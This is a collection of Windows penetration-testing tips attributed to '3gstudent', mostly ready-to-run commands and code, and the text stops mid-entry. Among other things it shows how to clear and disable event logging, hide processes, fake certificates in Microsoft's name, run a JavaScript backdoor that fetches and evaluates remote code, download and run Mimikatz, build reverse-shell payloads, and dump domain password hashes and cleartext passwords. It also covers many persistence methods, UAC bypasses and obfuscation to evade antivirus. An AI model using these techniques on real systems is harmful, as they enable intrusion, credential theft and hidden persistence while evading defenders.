A collection of pentest and development tips
Author: 3gstudent
The following techniques should not be used for illegal purposes.
Nmap's -sV can detect the service version, but in some cases it must be manually detected to verify.
Use Wireshark to get response packages is far less simple than using nc.
Eg.
For port 8001, use nc to connect the port and then enter a random string. You'll get the following result:
$ nc -vv localhost 8001
localhost [127.0.0.1] 8001 (?) open
asd
HTTP/1.1 400 Bad Request
Date: Fri, 25 Aug 2017 12:15:25 GMT
Server: Apache/2.4.23 (Debian)
Content-Length: 301
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.23 (Debian) Server at 127.0.0.1 Port 8001</address>
</body></html>
From this we know that this is an http service, because the string we sent is not a valid HTTP request, so we return a 400 Bad requests, we also get the system version is Debian, WebServer is Apache.
Reference:
Kali:
python -m SimpleHTTPServer 80
Windows:
certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 1.exe
certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete
Reference:
Add user:
net user test test /add
net localgroup administrators test /add
Modify the registry to support remote connections:
reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
IPC connection:
net use \\192.168.1.195 test /u:test
Get a list of evtx log categories:
wevtutil el >1.txt
Get statistics for a single evtx log category:
Eg.
wevtutil gli "windows powershell"
Output:
creationTime: 2016-11-28T06:01:37.986Z
lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:01:20.979Z
fileSize: 1118208
attributes: 32
numberOfLogRecords: 1228
oldestRecordNumber: 1
View the specific content of the specified evtx log:
wevtutil qe /f:text "windows powershell"
Find the specified amount of log content:
wevtutil qe /f:text "windows powershell" /c:20
Delete all information for a single log category:
wevtutil cl "windows powershell"
Reference:
Remove individual lines from Windows XML Event Log (EVTX) files:
The thread that implements the logging function is terminated by calling TerminateThread, which disables the logging function, but the Windows Event Log service is not destroyed and the state is still running.
Powershell:
https://github.com/hlldz/Invoke-Phant0m
C++:
https://github.com/3gstudent/Windwos-EventLog-Bypass
Reference:
《利用API-NtQueryInformationThread和I_QueryTagInformation实现对Windwos日志监控的绕过》
Use global APIhooks to modify the registry.
Download project: https://github.com/subTee/AppInitGlobalHooks-Mimikatz
Modify the code to specify the program name cldr.exe to be hidden, compile into cldr.dll, cldr.dll in C:\ProgramData\Microsoft\HelpLibrary\
Administrator privileges:
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f
At this time, cldr.exe does not exist in the task manager process list, cldr.exe does not exist in Process Explorer, and cldr.exe does not exist in Tasklist.exe.
For 64-bit systems:
Administrator privileges:
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldrx64.dll" /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f
Reference:
《利用globalAPIhooks在Win7系统下隐藏进程》
If a path contains both exe and com files with the same name, such as test.exe and test.com. Enter test (without the file suffix) through the command line, and the com file will be run first.
The generation of COM files only needs to change the suffix name of the exe file to com.
Reference:
《A dirty way of tricking users to bypass UAC》
Certificate generation and signature:
makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cer
cert2spc Root.cer Root.spc
pvk2pfx -pvk Root.pvk -pi 12345678password -spc Root.spc -pfx Root.pfx -f
signtool sign /f Root.pfx /p 12345678password test.exe
It will generate four files: Root.cer, Root.pfx, Root.pvk, and Root.spc, and test.exe will be digitally signed.
Certificate registration:
Add the certificate to localmachine(Administrator privileges):
certmgr.exe -add -c Root.cer -s -r localmachine root
Reference:
《A dirty way of tricking users to bypass UAC》
test.hta:
<HTML>
<HEAD>
<script language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
Connect="powershell -nop -windows hidden -E YwBhAGwAYwAuAGUAeABlAA=="
WshShell.Run Connect, 4, true
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</HEAD>
<BODY>
</BODY>
</HTML>
Reference:
《Bypass McAfee Application Control——Code Execution》
By default, c# cannot declare exported functions, but can be implemented by adding UnmanagedExports.
Of course, dlls written by c# need to be run in the corresponding version of the .NET environment. The dlls written in C++ are more general.
The dll can be loaded by rundll32.exe or regsvr32, but the dll is required to contain a specific export function.
Reference:
《Code Execution of Regsvr32.exe》
Essentially a DLL file with a suffix of cpl and an export function CPLApplet.
Five methods of implementation:
(1) Double click to run directly
(2) cmd
rundll32 shell32.dll,Control_RunDLL test.cpl
(3) cmd
control test.cpl
(4) vbs
Dim obj
Set obj = CreateObject("Shell.Application")
obj.ControlPanelItem("test.cpl")
(5) js
var a = new ActiveXObject("Shell.Application");
a.ControlPanelItem("c:\\test\\test.cpl");
Reference:
《CPL文件利用介绍》
Server:
https://github.com/3gstudent/Javascript-Backdoor/blob/master/JSRat.ps1
Client:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://192.168.174.131/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Of course, the RAT tool can also be loaded by:
- vbs
- js
- exe
- dll
- shellcode
Reference:
《JavaScript Backdoor》
《JavaScript Phishing》
Both windows and Linux apply
Reference:
《Memory Dump利用实例》
Visual C++:
- Modify the .vcxproj file
Visual Basic:
- Modify the .vbproj file
Visual F#:
- Modify the .fsproj file
Ability to execute arbitrary code when compiling for any of the above projects using Visual Studio
Reference:
《Pay close attention to your download code——Visual Studio trick to run code when building》
Tips 15. When a 32-bit program is executed under a 64-bit Windows system, there is a redirect if there is an operation on the registry and files.
For registry operations:
The actual path to access HKLM\Software\ is HKLM\Software\Wow6432Node\
For file operations:
The actual path to access c:\windows\Sysnative\ is c:\windows\system32
The actual path to access c:\windows\system32\ is c:\windows\SysWOW64\
Reference:
《关于32位程序在64位系统下运行中需要注意的重定向问题》
Copy ntds.dit:
Use NinjaCopy, https://github.com/3gstudent/NinjaCopy (Author: Joe Bialek, Twitter: @JosephBialek)
Dump hash:
Use quarkspwdump, https://github.com/quarkslab/quarkspwdump
esentutl /p /o ntds.dit
QuarksPwDump.exe -dhb -hist -nt c:\test\ntds.dit -o c:\test\log.txt
Use DSInternals PowerShell Module, https://www.dsinternals.com/wp-content/uploads/DSInternals_v2.8.zip
Applicable conditions:
Windows PowerShell 3.0 or 3.0+
.NET Framework 4.0 or 4.0+
Reference:
《导出当前域内所有用户hash的技术整理》
《利用Powershell快速导出域控所有用户Hash》
mimikatz:
mimikatz.exe "lsadump::dcsync /domain:test.local /all /csv" exit
Windows Server 2012 cannot use mimikatz to export clear-text password by default, as are some Windows Server 2008.
Workaround: Enable Wdigest Auth
cmd:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
or
powershell:
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
Restart or user login again, can export clear-text password
Reference:
《域渗透——Dump Clear-Text Password after KB2871997 installed》
Tips 18. The new password of the domain controller can be recorded in real time through Hook PasswordChangeNotify.
Of course, you can choose to save locally or upload your password to the server.
Reference:
《域渗透——Hook PasswordChangeNotify》
If the administrator neglects that the hosts in the domain use the same local administrator account, you can remotely log in to other hosts in the domain through pass-the-hash.
Reference:
《域渗透——Local Administrator Password Solution》
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-Exports.ps1
Get-Exports -DllPath c:\Windows\system32\dimsjob.dll -ExportsToCpp C:\test\export.txt
Reference:
《Study Notes Weekly No.3(Use odbcconf to load dll & Get-Exports & ETW USB Keylogger)》
Put the payload after 260 null characters, so you can't view the payload in the file attribute. It can be used to hide the payload in the shortcut, trick the user to click, and conceal the execution code.
Reference:
POC:
https://github.com/3gstudent/CreateRemoteThread/blob/master/CreateRemoteThread32to64.cpp
Reference:
Processes that use sytem permissions may encounter the following issues:
- Unable to get the current user's file content
For example, the user's screen cannot be captured
- Environmental variables are different
Therefore need to reduce the rights to the current user
https://github.com/3gstudent/From-System-authority-to-Medium-authority
Reference:
Use msdtc will load oci.dll with system privilege, but execute it in the admin privilege cmd: msdtc -install, it will start calc.exe with high permission.
Reference:
《Use msdtc to maintain persistence》
Tips 24. You can install WinPcap on Windows by command line, so you can use nmap and Masscan on the host you already control
Reference:
《渗透技巧——Windows平台运行Masscan和Nmap》
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe
Reference:
《利用白名单绕过360实例》
《利用白名单绕过限制的更多测试》
Encapsulate mimikatz into dll and run mimkatz via regsvr32 passed in parameters
rundll32 katz.dll,EntryPoint log coffee exit
Reference:
《Code Execution of Regsvr32.exe》
Download the xml file and save it as a.xml:
https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20mimikatz.xml
cmd:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe executes a.xml
Reference:
"C:\Program Files (x86)\MSBuild\14.0\Bin\csi.exe" c:\test\katz.csx
Reference:
https://gist.github.com/subTee/5c636b8736530fb20c3d
https://gist.github.com/subTee/b30e0bcc7645c790fcd993cfd0ad622f
Reference:
Save:
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Command'
$StaticClass.Put()
$StaticClass.Properties.Add('Command' , $Payload)
$StaticClass.Put()
Read:
$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value
Reference:
《WMI Backdoor》
Use the algorithm flaw of the file hash, hide the Payload from the PE file without affecting the digital signature of the PE file.
Reference:
(1) ...
type putty.exe > ...:putty.exe
wmic process call create c:\test\ads\...:putty.exe
(2) Special COM files
type putty.exe > \\.\C:\test\ads\COM1:putty.exe
wmic process call create \\.\C:\test\ads\COM1:putty.exe
(3) Disk root directory
type putty.exe >C:\:putty.exe
wmic process call create C:\:putty.exe
Reference:
《Hidden Alternative Data Streams的进阶利用技巧》
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list
The administrator may use WMI to record the attacker's call to WMI, which can be viewed by wmic. Of course, the monitoring function can be disabled by wmic.
Reference:
《Study Notes Weekly No.1(Monitor WMI & ExportsToC++ & Use DiskCleanup bypass UAC))》
wmic /node:192.168.1.10 /user:"administrator" /password:"123456" /NAMESPACE:"\\root\CIMV2" PATH Win32_OperatingSystem get CSName
msf:
msfvenom -p windows/meterpreter/reverse_http -f dll LHOST=192.168.174.133 LPORT=8080>./a.dll
Generate a.dll and upload it to the host
Execute rundll32.exe a.dll, Control_RunDLL,
https://raw.githubusercontent.com/3gstudent/test/master/meterpreter_reverse_tcp.cpp
Generate dll, rename it to cpl, double click to execute
rundll32 a.dll,EntryPoint
regsvr32 a.dll
Reference:
《Code Execution of Regsvr32.exe》
odbcconf.exe /a {regsvr c:\test\odbcconf.dll}
Reference:
《Study Notes Weekly No.3(Use odbcconf to load dll & Get-Exports & ETW USB Keylogger)》
Tracker.exe /d test.dll /c svchost.exe
Tracker.exe contains Microsoft digital signatures that bypass the limitations of the application whitelist
Reference:
Prerequisite: Microsoft Office software is installed
1.rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\test\\messagebox.dll');this.close();
2.js
var excel = new ActiveXObject("Excel.Application");
excel.RegisterXLL("C:\\test\\messagebox.dll");
3.powershell
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
$excel.RegisterXLL("C:\test\messagebox.dll")
Reference:
《Use Excel.Application object's RegisterXLL() method to load dll》
Copy xwizard.exe from %windir%\system32\ to the new directory C:\x.
Rename msg.dll to xwizards.dll and save it at C:\x.
Command line execution:
xwizard processXMLFile 1.txt
It will load C:\x\xwizards.dll.
Reference:
bitsadmin /create backdoor
bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"
bitsadmin /Resume backdoor
Reference:
《Use bitsadmin to maintain persistence and bypass Autoruns》
pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP1";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 1";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consP1";
ScriptingEngine = "JScript";
ScriptText = "GetObject(\"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
Administrator privileges:
mofcomp test.mof
Reference:
《WSC、JSRAT and WMI Backdoor》
Execute notepad.exe every 60 seconds
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""
Reference:
《Study Notes of WMI Persistence using wmic.exe》
Hijack the scheduled task UserTask, load testmsg.dll at system startup.
The operation is as follows:
Create a new item under HKEY_CURRENT_USER\Software\Classes\CLSID{58fb76b9-ac85-4e55-ac04-427593b1d060}
Then create a new item InprocServer32
The value is set to c:\test\testmsg.dll
Testmsg.dll contains the following export functions:
- DllCanUnloadNow
- DllGetClassObject
- DllRegisterServer
- DllUnregisterServer
Waiting for users to log in again.
Reference:
The helper DLL needs to include the export function InitHelperDll.
Administrator privileges:
netsh add helper c:\test\netshtest.dll
After the helper dll is successfully added, c:\test\netshtest.dll will be loaded each time netsh is called.
Reference:
Common ways:
- InjectDll
- RedirectShortcut
- RedirectEXE
《渗透测试中的Application Compatibility Shims》
Automatically enumerate processes through Rattler to detect the existence of available dll hijacking processes.
path:
- c:\windows\midimap.dll
Reference:
Write a custom Verifier provider DLL.
Install via Application Verifier.
Inject into the target process to execute the payload.
Whenever the target process starts, it will execute payload, which is equivalent to a self-starting method.
Reference:
《渗透测试中的Application Verifier(DoubleAgent利用介绍)》
Self-starting is not supported, but can be activated remotely, and the process is displayed as waitfor.exe
Reference:
《Use Waitfor.exe to maintain persistence》
For .Net programs, they can be hijacked by modifying the AppDomainManager. If you hijack the startup process of a system common .Net program such as powershell.exe and add a payload to it, you can implement a passive backdoor trigger mechanism.
Reference:
《Use AppDomainManager to maintain persistence》
If the office software is already installed, you can implement hijacking by configuring the Office add-in as a passive backdoor.
Commonly used methods:
- Word WLL
- Excel XLL
- Excel VBA add-ins
- PowerPoint VBA add-ins
POC: https://github.com/3gstudent/Office-Persistence
Reference:
《Use Office to maintain persistence》
《Office Persistence on x64 operating system》
Backdoor without administrator privileges and the ability to hijack all .Net programs.
POC: https://github.com/3gstudent/CLR-Injection
Reference:
《Use CLR to maintain persistence》
Use the MSDTC service to load dlls, implement self-starting, and bypass Autoruns to detect startup items.
Reference:
《Use msdtc to maintain persistence》
No need to reboot the system, no administrator privileges required.
Implemented by modifying the registry/
POC: https://github.com/3gstudent/COM-Object-hijacking
Reference:
No need to reboot the system, no administrator privileges required
Implemented by modifying the registry
Reference:
《Use COM Object hijacking to maintain persistence——Hijack explorer.exe》
By DLL hijacking, hijacking Explorer.exe to load fxsst.dll.
Explorer.exe will load c:\Windows\System32\fxsst.dll at startup (service is enabled by default for fax service)
Save the payload.dll in c:\Windows\fxsst.dll, which can implement dll hijacking, hijacking Explorer.exe to load fxsst.dll.
The same idea:
Rename payload.dll to linkinfo.dll and hijack Explorer.exe to load linkinfo.dll。
By dll hijacking, triggers backdoors when Office software performs certain functions.
Reference:
Create a special name for the registry key, which the user normally cannot read (use the Win32 API), but the system can execute (use the Native API)
Reference:
Modify the powershell configuration file, the backdoor is triggered after the powershell process starts.
Check to see if you are using a configuration file:
Test-Path $profile
Create a configuration file:
New-Item -Path $profile -Type File –Force
Modify the contents of the configuration file and add a backdoor:
$string = 'Start-Process "cmd.exe"'
$string | Out-File -FilePath "C:\Users\a\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
From:
https://rastamouse.me/2018/03/a-view-of-persistence/
Reference:
Applicable: Win7, Win8.1, Win 10
https://github.com/3gstudent/UAC-Bypass/blob/master/Invoke-EventVwrBypass.ps1
Reference:
《Study Notes of WMI Persistence using wmic.exe》
For Win10
Reference:
《Study Notes of using sdclt.exe to bypass UAC》
For Win8, Win10
reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Reference:
《Study Notes of using SilentCleanup to bypass UAC》
Only for Win7
Reference:
《Empire中的Invoke-WScriptBypassUAC利用分析》
Only for Win7
For Win7-Win10
Eg. gpedit.msc
Modify the environment variables, use the CLR to hijack the boot process of gpedit.msc.
Reference:
For Win7-Win10
- {B29D466A-857D-35BA-8712-A758861BFEA1}
- {D5AB5662-131D-453D-88C8-9BBA87502ADE}
- {0A29FF9E-7F9C-4437-8B11-F424491E3931}
- {CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}
Reference:
Modify process information, spoof PSAPI, call COM component to implement unauthorized operation.
Reference:
《通过COM组件IARPUninstallStringLauncher绕过UAC》
Tips 32. The exe or DLL generated by Visual Studio is used in other systems, indicating the lack of relevant DLL files.
Workaround: Package the program for release.
Project Menu -> Project Properties, C / C + + -> Code Generation -> Run Library, select multi-threading (/MT)
You can use LaZagne to export passwords stored in common applications in the current system (eg browser, Wifi, Git, Outlook, etc.)
https://github.com/AlessandroZ/LaZagne
Of course, you can also modify the LaZagne source code to implement password export for other applications.
Reference:
Read a text file:
$file = Get-Content "1.txt"
Write a text file:
Set-content "1.txt"
Read a binary file:
[System.IO.File]::ReadAllBytes('1.exe')
Write a binary file:
[System.IO.File]::WriteAllBytes("1.exe",$fileContentBytes)
Encoding:
$encoded = [System.Convert]::ToBase64String($fileContent)
Decoding:
$fileContent = [System.Convert]::FromBase64String($encoded)
Reference:
《Study Notes of using BGInfo to bypass Application Whitelisting》
https://github.com/danielbohannon/Invoke-Obfuscation
Eg.
Set the code to be confused:
set scriptblock " Invoke-111111 -Command "log privilege::debug sekurlsa::logonpasswords exit" "
Enter encoding
Enter 1 and specify the encoding as ascii
Get confused code:
" $(SEt-iTem 'VARIaBle:OFS' '' ) "+ [StRinG](( 73,110 , 118 ,111, 107, 101, 45, 49, 49 ,49 ,49 ,49 , 49, 32 , 45 , 67, 111, 109 , 109, 97 , 110 , 100 , 32,34,108, 111, 103 ,32, 112 ,114 , 105,118,105,108, 101, 103 ,101, 58 , 58 , 100 , 101 , 98, 117 ,103,32 , 115,101,107 ,117,114 , 108,115, 97 ,58 , 58, 108 ,111 ,103,111,110, 112, 97, 115 ,115,119, 111, 114, 100, 115, 32, 101, 120,105,116 ,34 )|FOReacH-objeCT{( [ChAR][iNT] $_) } ) +"$( Set-variAbLE 'oFS' ' ' ) "|. ( $env:PUbLic[13]+$eNv:PuBlIc[5]+'x')
Two common methods:
- Use py2exe
- Use PyInstaller
How to use and common bug fixes can refer to the reference link
Reference:
Eg.
Release files to the c:\windows folder with normal user rights
makecab c:\test\test.exe %TMP%\1.tmp
wusa %TMP%\1.tmp /extract:"c:\windows" /quiet
Applicable to Win7, Win8, learning from:
Reference:
《Empire中的Invoke-WScriptBypassUAC利用分析》
Common methods:
- at
- psexec
- WMIC
- wmiexec
- smbexec
- powershell remoting
Psexec usage:
psexec.exe \\test.local /accepteula -u test\admin -p test123! -s -c test.bat
Test.bat is local
New method:
- DCOM
Reference:
Enumerate the path of the executable file corresponding to the Windows system service. If the path contains the write permission of the normal user, the service can be used to increase the permission.
powershell code:
$ErrorActionPreference="SilentlyContinue"
$out = (Get-WmiObject win32_service | select PathName)
$out|% {[array]$global:path += $_.PathName}
for($i=0;$i -le $out.Count-1;$i++)
{
$a=Get-Acl -Path $out[$i].PathName.ToUpper().Substring($out[$i].PathName.ToUpper().IndexOfAny("C"),$out[$i].PathName.ToUpper().LastIndexOfAny("\"))
If($a.Owner -ne "NT AUTHORITY\SYSTEM"){
If($a.Owner -ne "NT SERVICE\TrustedInstaller"){
If($a.Owner -ne "BUILTIN\Administrators"){
Get-WmiObject win32_service | ?{$_.PathName -like $out[$i].PathName}|select Name,PathName,ProcessId,StartMode,State,Status
Write-host Owner: $a.Owner
}
}
}
}
Write-host [+] All done.
Reference:
《Use powershell to find a writable windows service》
Tips 41 Use anti-virus software configuration errors to achieve self-starting and prioritizing anti-virus software execution
Windows system supports Logon Scripts. Logon Scripts are executed at system startup. The execution order takes precedence over anti-virus software. Of course, anti-virus software cannot intercept the scripts in Logon Scripts (anti-virus software has not been started).
The key is whether the anti-virus software will intercept the configuration of Logon Scripts.
Add Logon Scripts with special operations, antivirus software will not intercept.
Note:
The anti-virus software mentioned above refers to "partial" anti-virus software, which is not universal.
Reference:
《Use Logon Scripts to maintain persistence》
Use Visual Studio:
The project name should correspond to the name specified by namespace. If it does not correspond, it can be modified in the project-attribute-assembly name. Otherwise, the generated dll cannot be used.
Use csc.exe:
Eg.
using System;
using System.Diagnostics;
namespace TestDotNet
{
public class Class1
{
static Class1()
{
Process.Start("cmd.exe");
Environment.Exit(0);
}
}
}
Save it as TestDotNet.cs and just use csc.exe to generate it:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library TestDotNet.cs
If saved as a.cs, then you need to add /out parameter to specify the output file as TestDotNet.dll, so the assembly name is also defaulted to TestDotNet (corresponding to the same code), otherwise, although the dll can be loaded, but can not be executed, the parameters are as follows :
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library /out:TestDotNet.dll a.cs
Use IPC connection, if the target is enabled with NetBIOS over TCP/IP, then:
- The target opens both ports 139 and 445, and the system preferentially uses port 445.
- Target disables port 445 and can connect using port 139
Target If NetBIOS over TCP/IP is disabled, then:
- Target disables port 445 and cannot connect
Start the service TrustedInstaller and get the TrustedInstaller permission through Token replication.
Common methods:
- SelectMyParent
- Invoke-TokenManipulation.ps1
- incognito
Reference:
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
1 means closed, 0 means open
View the port of the remote desktop connection:
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
Method 1: cmd
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
Method 2: reg file
The content is as follows:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
Import the registry:
regedit /s a.reg
Note:
Modify the connection port to take effect after restarting
supplement
If the system has not been configured with Remote Desktop Services, you will need to add a firewall rule when you first open it, allowing port 3389. The command is as follows:
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
If the connection fails and it says:An authentication error has occurred.The function requested is not supported.
We need to close this: Allow connections only from computers running Remote Desktop with Network Level Authentication (recommended)
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x00000000 /f
Kali:
rdesktop 192.168.1.1:3389
Windows:
mstsc.exe
Non-server version of Windows, only one account is allowed to log in by default.
The specific performance is:
When logging in remotely, use the same account as the original system, the original system will be switched to the login interface.
Use a different account, the original system desktop will prompt you to disconnect the current connection (default selection after 30 seconds)
Solution:
Use mimikatz.exe to execute ts::multirdp to allow multiple users to log in remotely.
The ability to achieve remote login of different accounts does not conflict, the original system desktop will not prompt the box.
Of course, use the same account as the original system, the original system will still be switched to the login interface.
Note:
This method fails after the system restarts. The next time you use it, you need to re-execute the command ts::multirdp.
It will be permanently modified by modifying the file termsrv.dll.
Reference:
The remote system needs to allow the Windows Firewall to remotely manage. The open command is as follows:
netsh advfirewall set currentprofile settings remotemanagement enable
Eg.
netsh -r 192.168.0.2 -u TEST\administrator -p domain123! advfirewall firewall add rule name="any" protocol=TCP dir=in localport=any action=allow
Reference:
When the UAC prompt box is popped up, execute arbitrary code, and insert the payload by modifying the function of the registry hijacking signature verification.
Reference:
《Authenticode签名伪造——PE文件的签名伪造与签名验证劫持》
By modifying the registry, you can add a Microsoft certificate to the PE file.
Reference:
《Authenticode签名伪造——PE文件的签名伪造与签名验证劫持》
《Authenticode签名伪造——针对文件类型的签名伪造》
Construct Long UNC file name, implement file name spoofing, get Catalog signature
Reference:
Used to create symbolic links, which can be understood as shortcuts.
Create the directory c:\test\1, point to c:\temp, and use the following actions:
(1) Create a link with the /D parameter command:
Mklink /D "c:\test\1" "c:\Temp"
(2) Create a join using the /J parameter command:
Mklink /J "c:\test\1" "c:\Temp"
difference:
The link created with the /D parameter has more "file shortcuts" for file attributes.
Use /J does not require administrator privileges.
Use /D requires administrator privileges.
Application scenario:
Change the path to the released file.
powershell -executionpolicy bypass -Command "Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -DumpCerts"
powershell -executionpolicy bypass -Command "Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command ""log ""privilege::debug"" ""sekurlsa::logonpasswords"""""
Reference:
Reference:
Reference:
\\<DOMAIN>\SYSVOL\<DOMAIN>\
All hosts in the domain can access, which saves group policy related data, including login script configuration files, etc.
Reference:
If your TeamViewer version is 13.0.5058, don't feel free to connect to an unknown TeamViewer server, it may be hacked.
Reference:
《TeamViewer 13.0.5058中的权限漏洞测试》
wevtutil qe security /rd:true /f:text /q:"*[System[(EventID=4672 or EventID=4623 or EventID=4672) and TimeCreated[@SystemTime>='2022-05-26T02:30:39' and @SystemTime<='2022-05-26T02:31:00']]]" /r:dc1 /u:administrator /p:password
wevtutil qe security /rd:true /f:text /q:"(Event/System/EventID=4624 or 4623 or 4672) and Event/System/TimeCreated/@SystemTime >= '2022-05-26T02:30:39' and Event/System/TimeCreated/@SystemTime <= '2022-05-26T02:31:00'" /r:dc1 /u:administrator /p:password
(Not recommended, direct download file is too large)
Obtain the domain control file: C:\Windows\System32\winevt\Logs\Security.evtx, filter event 4624/4623/4672.
The function return value of GetForegroundWindow() in the lock screen state is NULL, and the return value of GetForegroundWindow() function in non-lock screen state is a non-zero value.
Reference:
https://stackoverflow.com/questions/9563549/what-happens-behind-the-windows-lock-screen
Powershell POC:
https://github.com/3gstudent/Writeup/blob/master/CheckStandby.ps1
Judge through API GetIdleTime.
c#:
